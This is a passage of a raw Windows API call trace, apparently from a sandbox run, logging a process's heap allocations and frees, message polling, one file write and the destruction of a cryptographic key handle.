HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0130.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0130.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0130.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0130.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0130.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0130.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0130.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0130.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0130.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0130.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0130.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0130.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0130.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0130.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0130.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0130.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0130.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0130.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0130.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0130.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ee32b8 | out: hHeap=0x970000) returned 1 [0130.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0130.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0130.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0130.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0130.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0130.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0130.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0130.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0130.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0130.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0130.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0130.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0130.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0130.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0130.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0130.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0130.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0130.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eccd90 | out: hHeap=0x970000) returned 1 [0130.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0130.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0130.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0130.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0130.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0130.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f0fd08 | out: hHeap=0x970000) returned 1 [0130.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0130.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0130.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0130.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0130.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0130.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0130.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0130.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0130.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0130.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0130.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0130.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea0340 | out: hHeap=0x970000) returned 1 [0130.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0130.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0130.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0130.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0130.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0130.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0130.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0130.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eb6868 | out: hHeap=0x970000) returned 1 [0130.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0130.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0130.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16520) returned 0x2ea0340 [0130.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f26230 | out: hHeap=0x970000) returned 1 [0130.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0130.948] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0130.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0130.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0130.948] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0130.948] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0130.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0130.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0130.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0130.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0130.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0130.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0130.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16520) returned 0x2f26008 [0130.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0130.951] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f26008*, nNumberOfBytesToWrite=0x16520, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f26008*, lpNumberOfBytesWritten=0x8cf5e4*=0x16520, lpOverlapped=0x0) returned 1 [0130.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0130.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f26008 | out: hHeap=0x970000) returned 1 [0130.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0130.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0130.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0130.987] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0130.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0130.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0130.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0130.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0130.987] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0130.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0130.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0130.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0130.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0130.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0130.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0130.988] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d88 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0130.988] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0130.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0130.989] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0130.989] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0130.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0130.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0130.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0130.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0130.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0130.990] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0130.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0130.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0130.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0130.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0130.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0130.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0130.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0130.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0130.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0130.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0130.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0130.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0130.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0130.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50770, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0130.991] CryptDestroyKey (hKey=0xa87550) returned 1 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0130.991] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0130.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0130.992] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0130.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0130.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0130.992] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0130.992] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0130.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0130.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0130.992] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0130.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0130.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0130.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0130.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0130.992] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0130.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0130.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0130.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0130.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0130.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0130.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0130.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0130.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0130.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0130.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0130.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0130.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0130.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0130.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0130.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0130.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0130.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0130.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0130.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0130.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0130.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0130.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0130.993] HeapFree (in: 